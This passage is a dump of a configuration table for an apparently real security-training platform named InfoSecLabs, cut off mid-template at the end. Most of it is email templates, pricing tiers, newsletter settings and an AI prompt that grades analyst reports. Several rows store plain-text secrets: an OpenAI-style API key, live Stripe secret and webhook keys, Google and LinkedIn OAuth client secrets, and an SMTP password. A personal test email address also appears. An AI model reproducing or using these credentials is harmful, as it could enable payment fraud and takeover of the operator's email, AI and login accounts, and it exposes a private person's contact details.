('account_deleted_subject', '\"Account Deleted\"', 'email_template', '2026-03-13 05:11:26'),
('account_locked_body', '\"<h1>Account Locked</h1><p>Hi {{name}},</p><p>Your account has been locked due to multiple failed login attempts. Please contact support or try again later.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('account_locked_subject', '\"Your Account has been Locked\"', 'email_template', '2026-03-13 05:11:26'),
('ai_admin_approval', '\"false\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_alert_count', '\"2\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_alert_frequency', '\"12hours\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_api_key', '\"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\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_auto_gen_enabled', 'false', 'ai_integration', '2026-03-13 05:11:26'),
('ai_distribution_hours', '\"12\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_evaluation_enabled', '\"true\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_prompt', '\"You are a Professional SOC Analyst and Mentor at a high-security Security Operations Center.\\nYour task is to review and grade a junior analyst\'s investigation report for a security alert.\\n\\n### ALERT CONTEXT\\nTitle: {{title}}\\nSeverity: {{severity}}\\nDescription: {{details}}\\nIs Real World Example: {{example}}\\n\\n### ANALYST SUBMISSION\\nVerdict: {{verdict}}\\nAnalysis: {{analysis}}\\nSteps Taken: {{steps}}\\nConclusion: {{conclusion}}\\n\\n### EVALUATION CRITERIA\\n1. Verdict Accuracy (CRITICAL): Did the analyst correctly identify the true nature of the alert (True Positive vs False Positive)?\\n2. Analysis Depth: Did they interpret the raw logs correctly? Did they find the root cause?\\n3. Remediation: Were the steps taken (e.g., blocking IPs, isolating hosts, resetting passwords) appropriate for the severity?\\n4. Communication: Is the conclusion clear, professional, and actionable?\\n\\n### YOUR OUTPUT\\nYou must respond with valid JSON ONLY. Do not use Markdown formatting (like ```json).\\n\\n{\\n  \\\"grade\\\": <integer between 0 and 100>,\\n  \\\"feedback\\\": \\\"<Constructive, professional feedback addressed to the analyst. improved analysis tips.>\\\",\\n  \\\"ai_summary\\\": {\\n    \\\"verdict\\\": \\\"<The Correct Verdict>\\\",\\n    \\\"analysis\\\": \\\"<Expert technical analysis of what actually occurred in this alert>\\\",\\n    \\\"steps\\\": \\\"<The ideal remediation steps that should have been taken>\\\",\\n    \\\"conclusion\\\": \\\"<A concise executive summary suitable for management>\\\"\\n  }\\n}\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_provider', '\"openai\"', 'ai_integration', '2026-03-13 05:11:26'),
('ai_strategy', '\"random\"', 'ai_integration', '2026-03-13 05:11:26'),
('alert_assigned_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">New Incident Assigned</h1> <p>Hello <strong>{{name}}</strong>,</p> <p>A new security incident has been flagged and assigned to you for immediate analysis.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; uppercase;\\\">Incident Details</p> <h3 style=\\\"margin:5px 0; color:#fff; font-size:18px;\\\">{{title}}</h3> <p style=\\\"margin:0; color:#b026ff; font-weight:bold;\\\">Status: Pending Investigation</p> </div> <p>Review logs and submit your verdict.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">Start Investigation</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('alert_assigned_subject', '\"New Mission: {{title}}\"', 'email_template', '2026-03-16 06:05:29'),
('articles', '\"[]\"', 'newsletter', '2026-03-13 05:11:26'),
('award_gold_body', '\"<h1>🏆 Gold Award Earned!</h1><p>Hi {{name}},</p><p>Congratulations on your outstanding performance! You have been awarded the Gold Analyst Badge.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('award_gold_subject', '\"Congratulations! You earned a Gold Award\"', 'email_template', '2026-03-13 05:11:26'),
('award_won_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Achievement Unlocked</h1> <div style=\\\"text-align: center; margin-bottom: 20px;\\\"> <div style=\\\"font-size: 64px;\\\">🏆</div> </div> <p style=\\\"text-align: center; font-size: 18px;\\\">Congratulations, <strong>{{name}}</strong>!</p> <p style=\\\"text-align: center;\\\">You have earned the <strong>{{awardType}} Tier Analyst</strong> award.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #f59e0b; text-align: center;\\\"> <p style=\\\"color: #fff;\\\">This badge has been added to your profile as a testament to your elite status.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/profile\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #f59e0b 0%, #d97706 100%); box-shadow: 0 4px 15px rgba(245, 158, 11, 0.4);\\\">View Profile</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('award_won_subject', '\"Achievement Unlocked: {{awardType}} Award\"', 'email_template', '2026-03-16 06:05:29'),
('banner_enabled', 'true', 'general', '2026-03-13 05:11:26'),
('banner_message', '\"✨ Don’t Miss Out! Unlock 60% Savings Today Only ✨\"', 'general', '2026-03-13 05:11:26'),
('blog_automation_is_running', 'false', 'blog_automation', '2026-03-15 06:01:16'),
('blog_automation_status', '{\"status\":\"idle\",\"message\":\"Successfully created draft: Starbucks discloses data breach affecting hundreds of employees\",\"lastRun\":\"2026-03-15T06:01:01.173Z\",\"lastRunStatus\":\"success\"}', 'blog_automation', '2026-03-15 09:01:01'),
('blog_auto_pilot_enabled', 'true', 'blog_automation', '2026-03-15 06:01:08'),
('blog_lock_cisa-flags-actively-exploited-n8n-rce-bug-as-24-700-instances-remain-exposed', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_google-fixes-two-chrome-zero-days-exploited-in-the-wild-affecting-skia-and-v8', 'locked', 'blog_locks', '2026-03-14 09:00:04'),
('blog_lock_google-fixes-two-new-chrome-zero-days-exploited-in-attacks', 'locked', 'blog_locks', '2026-03-14 09:00:07'),
('blog_lock_interpol-dismantles-45-000-malicious-ips-arrests-94-in-global-cybercrime', 'locked', 'blog_locks', '2026-03-15 09:00:03'),
('blog_lock_microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-patch-tuesday-march-2026-edition', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-patches-84-flaws-in-march-patch-tuesday-including-two-public-zero-days', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-releases-windows-10-kb5078885-extended-security-update', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-releases-windows-11-oob-hotpatch-to-fix-rras-rce-flaw', 'locked', 'blog_locks', '2026-03-15 06:01:21'),
('blog_lock_microsoft-windows-11-users-can-t-access-c-drive-on-some-samsung-pcs', 'locked', 'blog_locks', '2026-03-15 09:00:03'),
('blog_lock_starbucks-discloses-data-breach-affecting-hundreds-of-employees', 'locked', 'blog_locks', '2026-03-15 09:00:07'),
('blog_lock_supply-chain-risk-why-vendors-are-the-new-zero-day', 'locked', 'blog_locks', '2026-03-14 18:13:20'),
('blog_lock_veeam-patches-7-critical-backup-replication-flaws-allowing-remote-code-execution', 'locked', 'blog_locks', '2026-03-14 09:00:09'),
('blog_lock_veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks', 'locked', 'blog_locks', '2026-03-14 18:13:26'),
('blog_lock_web-server-exploits-and-mimikatz-used-in-attacks-targeting-asian-critical-infrastructure', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_weekly-recap-qualcomm-0-day-ios-exploit-chains-airsnitch-attack-vibe-coded-malware', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('build_id', '\"1741453200\"', 'version', '2026-03-13 05:11:26'),
('day', '\"friday\"', 'newsletterSchedule', '2026-03-13 05:11:26'),
('default_threat_map', '\"https://livethreatmap.radware.com\"', 'general', '2026-03-13 05:11:26'),
('discount_monthly_percent', '\"60\"', 'payment', '2026-03-13 05:11:26'),
('discount_yearly_percent', '\"60\"', 'payment', '2026-03-13 05:11:26'),
('email_from_address', '\"noreply@infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_host', '\"\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_pass', '\"\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_port', '\"587\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_user', '\"\"', 'email', '2026-03-13 05:11:26'),
('enabled', 'true', 'newsletterSchedule', '2026-03-13 05:11:26'),
('free_tier_limit', '\"3\"', 'general', '2026-03-13 05:11:26'),
('giveaway', '\"{\\\"last_winner_id\\\":189,\\\"last_winner_name\\\":\\\"Amadou Mane\\\",\\\"last_awarded_at\\\":\\\"2026-02-28T21:00:00.850Z\\\",\\\"award_type\\\":\\\"gold\\\"}\"', NULL, '2026-03-13 05:11:26'),
('google_analytics_id', '\"G-L24HQ8D3ZW\"', 'general', '2026-03-13 05:11:26'),
('google_client_id', '\"891940943701-vpaiopokpe1fau3pa1ujvfh37ldkjvjr.apps.googleusercontent.com\"', 'oauth', '2026-03-13 05:11:26'),
('google_client_secret', '\"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\"', 'oauth', '2026-03-13 05:11:26'),
('google_enabled', 'true', 'oauth', '2026-03-13 05:11:26'),
('hide_tiers', 'false', 'payment', '2026-03-13 05:11:26'),
('hour', '\"9\"', 'newsletterSchedule', '2026-03-13 05:11:26'),
('investigation_graded_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Performance Review</h1> <p>Your investigation report for <strong>{{title}}</strong> has been audited.</p> <div style=\\\"background-color: #131416; border: 1px solid #333; border-radius: 8px; padding: 20px; text-align: center; margin: 20px 0;\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase; letter-spacing:1px;\\\">Final Grade</p> <h2 style=\\\"margin:10px 0; font-size:48px; color: #{{gradeColor}};\\\">{{grade}}</h2> </div> <div class=\\\"card\\\" style=\\\"border-left: 4px solid #{{gradeColor}};\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px;\\\">Auditor Feedback</p> <p style=\\\"margin:5px 0 0 0; color:#fff; font-style:italic;\\\">\\\"{{feedback}}\\\"</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">View Full Details</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('investigation_graded_subject', '\"Report Graded: {{title}}\"', 'email_template', '2026-03-16 06:05:29'),
('linkedin_client_id', '\"78hx8fqv7sgh54\"', 'oauth', '2026-03-13 05:11:26'),
('linkedin_client_secret', '\"WPL_AP1.sWmY8fRq08WDknvX.zqKpHw==\"', 'oauth', '2026-03-13 05:11:26'),
('linkedin_enabled', 'true', 'oauth', '2026-03-13 05:11:26'),
('newsletter_day', '\"monday\"', NULL, '2026-03-13 05:11:26'),
('newsletter_enabled', '\"1\"', NULL, '2026-03-13 05:11:26'),
('newsletter_hour', '\"7\"', NULL, '2026-03-13 05:11:26'),
('password_reset_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Password Reset Protocol</h1> <p>We received a request to reset the credentials for your account.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #fca5a5;\\\"> <p style=\\\"margin:0; color:#f87171; font-weight:bold;\\\">Expiration Warning</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">This secure link expires in 60 minutes.</p> </div> <p>If you did not initiate this request, immediate perimeter checks are recommended.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #ef4444 0%, #b91c1c 100%); box-shadow: 0 4px 15px rgba(239, 68, 68, 0.4);\\\">Reset Password</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('password_reset_subject', '\"Security Alert: Password Reset Request\"', 'email_template', '2026-03-16 06:05:29'),
('plan_free_name', '\"Free Tier\"', 'payment', '2026-03-13 05:11:26'),
('plan_monthly_name', '\"Monthly Pro\"', 'payment', '2026-03-13 05:11:26'),
('plan_yearly_name', '\"Yearly Pro\"', 'payment', '2026-03-13 05:11:26'),
('price_free', '\"0\"', 'payment', '2026-03-13 05:11:26'),
('price_monthly', '\"19.99\"', 'payment', '2026-03-13 05:11:26'),
('price_yearly', '\"199.99\"', 'payment', '2026-03-13 05:11:26'),
('registration_enabled', '\"true\"', 'general', '2026-03-13 05:11:26'),
('reset_password_body', '\"<h1>Password Reset Request</h1><p>You requested to reset your password. Click the link below to proceed:</p><p><a href=\\\"{{url}}\\\">Reset Password</a></p><p>If you did not request this, please ignore this email.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('reset_password_subject', '\"Reset your InfoSec Labs Password\"', 'email_template', '2026-03-13 05:11:26'),
('site_title', '\"InfoSecLabs\"', 'general', '2026-03-13 05:11:26'),
('smtp_host', '\"mail.infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('smtp_pass', '\"Konyalim82@\"', 'email', '2026-03-13 05:11:26'),
('smtp_port', '\"587\"', 'email', '2026-03-13 05:11:26'),
('smtp_user', '\"noreply@infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('stripe_price_display_monthly', '\"$7.59\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_display_yearly', '\"$75.99\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_monthly', '\"price_1TALBWL5VKtXn66bRSJSd4k8\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_original_monthly', '\"18.98\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_original_yearly', '\"189.98\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_yearly', '\"price_1TALBXL5VKtXn66bosag5eho\"', 'payment', '2026-03-13 05:11:26'),
('stripe_publishable_key', '\"pk_live_51QQtYrL5VKtXn66boiqeGpfhs7jYgGOERnWlxNwjTYtFuigU04AdXl0CnFhH0FLBUNo6MVAjPLACpXcYjgJuY3BU00ViZYgEBE\"', 'payment', '2026-03-13 05:11:26'),
('stripe_secret_key', '\"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\"', 'payment', '2026-03-13 05:11:26'),
('stripe_webhook_secret', '\"whsec_TTJgpSwgkcQFwNyM7IKkrodE2aTTSL8H\"', 'payment', '2026-03-13 05:11:26'),
('subscriber_count', '\"203\"', 'newsletter', '2026-03-13 05:11:26'),
('subscription_upgraded_body', '\"<h1>Welcome to Pro!</h1><p>Hi {{name}},</p><p>Your account has been successfully upgraded to the Pro plan. Enjoy access to all premium features!</p>\"', 'email_template', '2026-03-13 05:11:26'),
('subscription_upgraded_subject', '\"Subscription Upgraded to Pro\"', 'email_template', '2026-03-13 05:11:26'),
('support_email', '\"support@infoseclabs.io\"', 'general', '2026-03-13 05:11:26'),
('system_email', '\"noreply@infoseclabs.io\"', 'general', '2026-03-13 05:11:26'),
('testEmail', '\"halilbaris@gmail.com\"', 'newsletter', '2026-03-13 05:11:26'),
('tier_large_price', '\"10.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_large_stripe_id', '\"price_1Ss7tnL5VKtXn66bknA3p8Qg\"', 'payment', '2026-03-13 05:11:26'),
('tier_large_stripe_id_yearly', '\"price_1Ss7toL5VKtXn66bgJTb3as9\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_price', '\"11.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_stripe_id', '\"price_1Ss7tjL5VKtXn66b7UWfkCQe\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_stripe_id_yearly', '\"price_1Ss7tpL5VKtXn66b4oXBQ9yj\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_price', '\"12.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_stripe_id', '\"price_1Ss7thL5VKtXn66bK1YWxkdV\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_stripe_id_yearly', '\"price_1Ss7tqL5VKtXn66bcWLhJjOC\"', 'payment', '2026-03-13 05:11:26'),
('timestamp', '\"2026-03-08T17:00:00Z\"', 'version', '2026-03-13 05:11:26'),
('verification_body', '\"<h1>Welcome to InfoSec Labs!</h1><p>Please verify your email address by clicking the link below:</p><p><a href=\\\"{{url}}\\\">Verify Email</a></p>\"', 'email_template', '2026-03-13 05:11:26'),
('verification_subject', '\"Verify your InfoSec Labs Account\"', 'email_template', '2026-03-13 05:11:26'),
('verify_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Verify Your Account</h1> <p>Welcome, Analyst.</p> <p>To initialize your secure workspace and begin your training simulations, you must verify this communication channel.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase;\\\">Action Required</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">Click the button below to activate your clearance.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Verify Email</a> </div> <p style=\\\"font-size: 12px; color: #666; margin-top: 30px;\\\">Direct uplink: <br><a href=\\\"{{link}}\\\" style=\\\"color: #666;\\\">{{link}}</a></p> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('verify_email_subject', '\"Action Required: Verify Your Identity\"', 'email_template', '2026-03-16 06:05:29'),
('version', '\"1.2.0\"', 'version', '2026-03-13 05:11:26'),
('weekly_report_body', '\"\\n<!DOCTYPE html>\\n<html>\\n<head>\\n    <meta charset=\\\"utf-8\\\">\\n    <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\n</head>\\n<body style=\\\"margin: 0; padding: 0; background-color: #0e0f11; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, sans-serif;\\\">\\n    <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" style=\\\"background-color: #0e0f11; padding: 40px 20px;\\\">\\n        <tr>\\n            <td align=\\\"center\\\">\\n                <table width=\\\"600\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" style=\\\"max-width: 600px;\\\">\\n                    <!-- Header -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding-bottom: 30px;\\\">\\n                            <img src=\\\"https://infoseclabs.io/logo.png?v=2\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; margin-bottom: 20px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\">\\n                            <h1 style=\\\"color: #ffffff; font-size: 28px; margin: 0 0 10px 0;\\\">Weekly Analyst Report</h1>\\n                            <p style=\\\"color: #888; font-size: 14px; margin: 0;\\\">Performance Metrics & Activity Summary</p>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- Greeting -->\\n                    <tr>\\n                        <td style=\\\"padding: 20px 0;\\\">\\n                            <p style=\\\"color: #cccccc; font-size: 15px; margin: 0; text-align: center;\\\">\\n                                Hello {{name}}, 👋<br><br>\\n                                Here is your performance summary for this week.\\n                            </p>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- This Week Stats -->\\n                    <tr>\\n                        <td style=\\\"background-color: #1a1b1e; border-radius: 12px; padding: 25px; margin-bottom: 20px; display: block;\\\">\\n                            <div style=\\\"border-bottom: 1px solid #2a2a3e; padding-bottom: 15px; margin-bottom: 20px;\\\">\\n                                <span style=\\\"color: #b026ff; font-weight: 